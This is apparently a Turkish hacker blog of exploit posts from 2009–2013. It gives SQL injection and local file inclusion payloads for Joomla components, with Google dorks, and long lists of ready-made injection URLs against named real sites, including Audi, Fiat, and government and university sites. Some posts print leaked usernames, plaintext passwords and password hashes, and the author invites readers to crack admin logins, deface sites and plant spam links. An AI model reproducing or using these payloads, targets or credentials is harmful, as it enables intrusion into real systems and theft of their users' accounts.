SQL İNJECTİON etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
SQL İNJECTİON etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

17 Mart 2013 Pazar

Joomla Component RSfiles <= (cid) SQL injection Vulnerability

Bildiginiz gibi şu sayfamdaki hizmetim  hacklink satışı için listeme taze kan lazım oldugu için elimdeki daha önceden shell soktugum sitelerin eklentilerini incelerken farkettigim bir güvenlik açıgıdır, bu güvenlik açıgı, joomla RSfiles eklentisini kullanan sitelerde veritabanına erişmemize ve sitenin tablolarından kolonlarda var olan her türlü bilgiyi okuyabilmemizi saglamaktadır..

arama kodu : com_rsfiles

arama sonuçlarında sitenin sonuna eklenecek kod:    index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

Bu kodla sadece  db adı ve db versiyonunu ögrenebilirsiniz. geri kalan için kendinizle baş başasınız, herşeyi devletten beklemeyin araştırın biraz yapabilirseniz çekin admin bilgilerini şifrelerini kırın sonrada admin paneline girip istediginizi yapın ister siteyi hackleyin istersenizde hacklink ekleyin okyy . :)

*********************************
# Turkey.

3 Haziran 2010 Perşembe

Joomla Component com_lead SQL Injection

[TR] Title: Joomla Component com_lead   SQL Injection

[TR] Date: 03.06.2010
   
[TR] Author: ByEge

[TR] Homepage: byege.blogspot.com

[TR] Vendor: http://www.leadya.co.il/

<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>


[TR]  ExploiT     :

index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'

column number : 14
column name : username , password
table name : jos_users

<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>
<=>[TR]<=>[Turkish]<=>[Palestine]<=>[Defacer]<=>[Down]<=>[israel]<=>[TR]<=>

[TR]  Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN

23 Mayıs 2010 Pazar

18 Mayıs 2010 Salı

Webloader Adult Script ( vid ) SQL Injection Vulnerability

Url :  http://www.tunuskirtasiye.com.tr/pub/Webloader.txt

Url :  http://www.exploit-db.com/exploits/12647


 Açıgı Barındıran bir kaç site 


http://www.seksizlesene.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://www.fk5.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://www.eftelya.org/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://sikisoteli.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://www.8pornoizle.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://www.koxp.org/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://www.seksizle18.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://www.laqr.com/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

http://taviz.net/izle.php?vid=1'/**/uNIOn/**/aLl/**/sELEcT/**/0,1,2,GosTer,4,5,6,7,8,9,8,ayar/**/fROm/**/ayarlar/**/wHERe/**/ayar='SiFre

16 Mayıs 2010 Pazar

Joomla Component com_job LFI Vulnerability

[!] Title: Joomla Component com_job LFI Vulnerability

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

index.php?option=com_job&controller=[LFI]

[!]  Example     :

http://localhost.free/index.php?option=com_job&controller=../../../../../../etc/passwd


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_crowdsource SQL Injection

[!] Title: Joomla Component com_crowdsource   SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-335/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_resource SQL Injection

 BİZE SOSYAL MUHENDİSLİKTEN  BASKA BİR BOK BİLMİYORSUNUZ  DİYENLERE KAPAK OLSUN

[!] Title: Joomla Component com_resource SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]##########################################[+]


[!]  Google Dork : inurl:com_resource

[!]  ExploiT     :

-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_resource&view=single&cid[]=-464/**/UNION/**/SELECT/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--


[+]##########################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

Joomla Component com_comp ( cid ) SQL Injection

[!] Title: Joomla Component com_comp ( cid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_comp&task=view&cid=-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version())/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_product ( catid ) SQL Injection

[!] Title: Joomla Component com_product ( catid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_product&catid=-24/**/uNIOn/**/sELECt/**/1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_doqment ( cid ) SQL Injection

[!] Title: Joomla Component com_doqment ( cid )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELeCt/**/1,2,3,4,5,6,7,8/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_doqment&cid=-15/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_classifieds ( subcategory ) SQL Injection

[!] Title: Joomla Component com_classifieds ( subcategory )  SQL Injection

[!] Date: 16.05.2010
   
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_classifieds&act=providers&task=details&cid=2122&category=0&subcategory=0+and+1=2+UnioN/**/SeLeCT/**/concat_ws(username,0x3a,password)/**/from/**/jos_users/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

Joomla Component com_product LFI Vulnerability

[!] Title: Joomla Component com_product LFI Vulnerability

[!] Date: 16.05.2010
  
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

index.php?option=com_product&controller=[LFI]

[!]  Example     :

http://localhost.free/index.php?option=com_product&controller=../../../../../../etc/passwd


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,

[!]  Ege'nin sözü :  En iyi yol, bildigin yoldur.

21 Mart 2010 Pazar

Audi - Fiat - Nod32 v.s SQL İnjection

http://www.audi.rs//news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.si/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ua/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.ro/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://ro.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://w3.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.sk/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.mk/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.bg/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.com.hr/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://wwww.audi.hu/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.yu/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://bg.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://www.audi.co.rs/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://al.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.ua.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://si.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users
http://cms.hr.audi.at/news.php?newsid=689+and+1=2+  union+select+0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from suche_users

http://www.nod32-la.com/isps/deperu/news.php?i=-221 UNION SELECT 1,2,3,4,version(),6,7,8--
http://www.hispanicprwire.com/news.php?l=in&id=-1801 UNION SELECT 1,2,3,concat(User,0x3a,Login,0x3a,Password,0x3a,E_mail),5,6,7,8,9,10 from HPR_Extenal_User
http://500.fiat.bg/news.php?id=-62 UNION SELECT 1,2,concat(ime,0x3a,fam,0x3a,pol,0x3a,nacia,0x3a,city,0x3a,tel,0x3a,mail),4,5,6,7 from users
http://fiat.bg/?id=222&lan=BG&nid=-26 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables
http://www.americanbreweriana.org/news/news_detail.php?selectid=-24 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11--


http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5 from users
http://www.simbin.se/news.php?newsid=-120 UNION SELECT 1,version(),3,4,5--
http://www.traffictechnologytoday.com/news.php?NewsID=-13388 UNION SELECT 1,2,3,concat(UserName,0x3a,UserPassword),5,6,7,8,9,10 from passenger.Users
http://www.tam.gov.mv/news.php?newsID=-36 UNION SELECT 1,group_concat(username,0x3a,user_password),3,4,5,6 from phpbb_users

19 Mart 2010 Cuma

Mambo com_acstartseite SQL injection..

Google dork : index.php?option=com_acstartseite

http://localhost/index.php?option=com_acstartseite&Itemid=-110 UNION SELECT 1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from mos_users--

1 Şubat 2010 Pazartesi

yildiz.edu.tr sql injection

 http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=1244  'a ekleyin explorer'in titlesine bakın bir hata oluştu diyor..

http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=-1244 UNION SELECT  column degeri vermeyince  alttaki gibi bir hata veriyor yani birda SQL İNJECTİON acıgımız var..

SQL de bir hata oluştu. (getNewsFiles function) id = -1244 UNION SELECT 
Geri dönmek için lütfen burayı tıklayınız.  


Manuel Link :    http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=-1244 UNION SELECT null,null,null,null,null,version()--

PHP/4.4.4 version  çok ugraştım ama ben bişi yapamadım belki daha iyi anlıyan arkadaşlar yapar..

Gov.tr Sql injection ( Basmıyan Top Olsun )

http://www.trabzonnumune.gov.tr/devam.php?id=550+and+1=2+ UNION SELECT 1,2,3,4,5,6,7,group_concat(dUser,0x3D,dPass),9,10,11 from users

çiçek = 987654
hololu = 987654
celalu = 123456
ekrema = 0000
dr = 1234
dahiliye = 1234
ibrahim = 00061000

25 Ocak 2010 Pazartesi

Citroen.ua Sql İncejtion

http://www.citroen.ua/news/index.php?id=-65 UNION SELECT 1,2,group_concat(Username,0x3D,Password),4,5,6 from site_user

26 Aralık 2009 Cumartesi

SQL injection açıklı siteler

http://www.bote.yildiz.edu.tr/v2/index.php?option=com_mezun&task=edit&hidemainmenu=0&id=-99999 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from jos_users

http://stat.ogu.edu.tr/atalay/index.php?option=com_mezun&task=edit&hidemainmenu=1&id=-601 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 from jos_users

http://www.circassiancommunity.com/webroot/cb-newsdetail.php?token=7eab9310c5fb03ed4149c55e3130449b&news_id=-17 UNION SELECT 1,2,admin_login,admin_password,admin_mail,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from cc_admins

http://belediyemdergisi.net/kategori.php?id=-8 UNION SELECT 1,kuladi,3,4,5,ksifre,7 from yonetim

http://www.medyabu.com/haber_detay.php?id=-1250 UNION SELECT 1,2,3,k_adi,sifre,6,7,8,9,10,11,12,13,14 from kullanicilar

http://www.gunisigigazetesi.net/cikti1.php?id=-1 UNION SELECT 1,2,3,4,kullanici_adi,sifre,7,8 from yoneticiler

http://www.psikoturk.net/kategori.php?iid=-16 UNION SELECT 1,login,password,4,5,6,7,8,9,10,11,12,13 from users

http://www.merhaba.info/haberler/devami.php?id=-10967 UNION SELECT 1,2,3,4,5,name,pwd,usr,9,10,11,12,13,14,15,16,17 from logon

http://www.altanplastik.com.tr/haber.php?id=-3 UNION SELECT 1,2,user,pass from users

http://www.cosarkomur.com.tr/duyuru.php?id=-1%20UNION%20SELECT%201,user,3,pass%20from%20users

http://genaygayrimenkul.com/?sayfa=ek_sayfa&id=-11 UNION SELECT 1,2,danisman_sifre,4,danisman_kullanici,6 from emlak_danisman

http://www.bigblue.com.tr/tr/main.php?page=basindan_detay&id=-1 UNION SELECT 1,username,3,4,5,password,7,8,9 from admin

http://www.hrantdink.org/tr/duyuru.php?id=-1 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables

http://www.rahimtarim.com/duyuru.php?id=-89 UNION SELECT 1,2,3,4,5,6,7,admin_password,9,10 from calendar_admin

http://egitimcemberi.com/haber_detay.php?id=-3 UNION SELECT 1,kuladi,3,sifsif,5 from siteuyeleri

http://www.istanbul.edu.tr/itf/ortopedi/yazdir.php?category=tarihce&category_name=Tarihçe&title_id=1&text_id=-1 UNION SELECT 1,2,3,password,email from users

http://www.sohbetagi.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.sohbette.in/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.ecesohbet.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,user,password))),5,6 from mysql.user--

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,name,pwd))),5,6 from nuke_authors--

http://www.joinvillecultural.sc.gov.br/noticia.php?cd_noticia=-975%20UNION%20SELECT%20nome,senha%20from%20usuario
http://www.camaradc.sc.gov.br/home/noticias.php?id=-169%20%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20admin

http://www.emsetur.se.gov.br/noticias.php?id=-414%20UNION%20SELECT%201,2,senha,login,5%20from%20acesso

http://wanning.hainan.gov.cn/v6/news/news.php?type=qiye_dt&id=-4714%20UNION%20SELECT%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%20c_user

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2015,1
http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20limit%2018,1

http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20permissao MD5 KIRCAN

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2025,1

http://www.kimkimdir.gen.tr/yazdir.php?id=-22%20UNION%20SELECT%201,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201,1
telekomun serveri
---------

http://azdavay.meb.gov.tr/haber/ayrinti.php?id=-1+union+select+0,concat(sifre,0x3a,kul_adi),2,3,4,5,6,7,8+from+uyeler

http://www.aliaga.pol.tr/sizdengelenlerayrinti.php?id=-152%20UNION%20SELECT%201,kullaniciadi,sifre%20from%20yonetimkullanicilar

http://www.lakatospal.hu/article_print.php?id=-145%20UNION%20SELECT%201,username,pw,4,5,6,7,8,9,10,11,12,13%20from%20users


http://www.emniyetemlak.com/ayrinti.php?id=-1 UNION SELECT 1,CONVERT(table_name USING latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables limit 17,1


http://salihlirehber.com/rehbercat.php?sayfa=1&category=-5 UNION SELECT 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=CHAR(102, 105, 114, 109, 97, 108, 97, 114)

http://www.soma.web.tr/somailan/index.php?catid=-21 UNION SELECT 1,2

http://www.yozgatgazetesi.com/anketler.asp?islemID=101&ID=20+union+select+0+from+

http://www.vidinli.com/elemanilan/ayrinti.php?nopass=1&id=-962 UNION SELECT CONVERT(column_name USING latin1),2,3,4,5,6,7,8,9 from information_schema.columns where table_name=CHAR(101, 104, 99, 112, 119, 105, 107, 105, 95, 117, 115, 101, 114)

http://www.kimacaba.com/ayrinti.php?id=-2897%20UNION%20SELECT%201,column_name,3,4,5,6%20from%20information_schema.columns%20where%20table_name=%27biyografi%27%20limit%201,1

http://www.gal.k12.tr/oku.php?id=-182%20UNION%20SELECT%201,2,3,4,5,6,column_name,8,9,10,11%20from%20information_schema.columns%20where%20table_name=CHAR(97,%20100,%20109,%20105,%20110,%20100,%2097,%20116,%2097)

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user


http://www.sanmarenerji.com/TR/urun-detay.php?id=-12 UNION SELECT 1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name=CHAR(107, 117, 108, 108, 97, 110, 105, 99, 105) limit 6,1

http://www.opednews.com/populum/link.php?id=-83615%20UNION%20SELECT%201,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables%20limit%2017,1

http://www.yuzeyislem-kumlama.com/haberler.php?id=-162 UNION SELECT 1,2,3,«ê from information_schema.tables limit 17,1

http://www.perdeciler.com/haberler.php?id=-162 UNION SELECT 1,2,3,4,5,6,eposta,pass,9,10,11,12,13 from members


http://clerideslegal.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://theatreantidote.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://www.ogilvy.com.cy/link.php?id=-261%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users

http://skadsillustration.com/prints.php?id=-8 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables limit 17,1

http://www.charlesritchie.com/prints.php?id=-346%20UNION%20SELECT%201,2,group_concat(%20column_name%20),4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.columns%20where%20table_name=CHAR(119,%20112,%2095,%20117,%20115,%20101,%20114,%20115)

http://www.darrencoldwell.com/prints.php?id=-20%20UNION%20SELECT%201,2,3,4,userPWD,6,userName%20from%20ob_users

http://www.artistanncoleman.com/prints.php?action=viewimage&id=-78 UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 17,1

http://www.casino-games-internet.com/ca/new.php?ID=-1741 UNION SELECT 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables limit 17,1

25 Aralık 2009 Cuma

simcrest.com SQL injection

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,Adauth),3,4,5,6,7,8 from simcrest_relay.relay_users

admin=7f0274a99146ae15eda88d85c3bf3cb9
http://www.simcrest.com/relay/ panel girişi..

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,email),3,4,5,6,7,8 from users

redgell=b3ed48555a989b8ee27f613f7b5724dd=redgell@netsuccess.com

JOOMLA com_wcflm SQL injection

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_wcflm

http:/localhost/index.php?option=com_wcflm&task=showList&flmlist_id=2&id= inj code..

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT password from jos_users--

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT username from jos_users--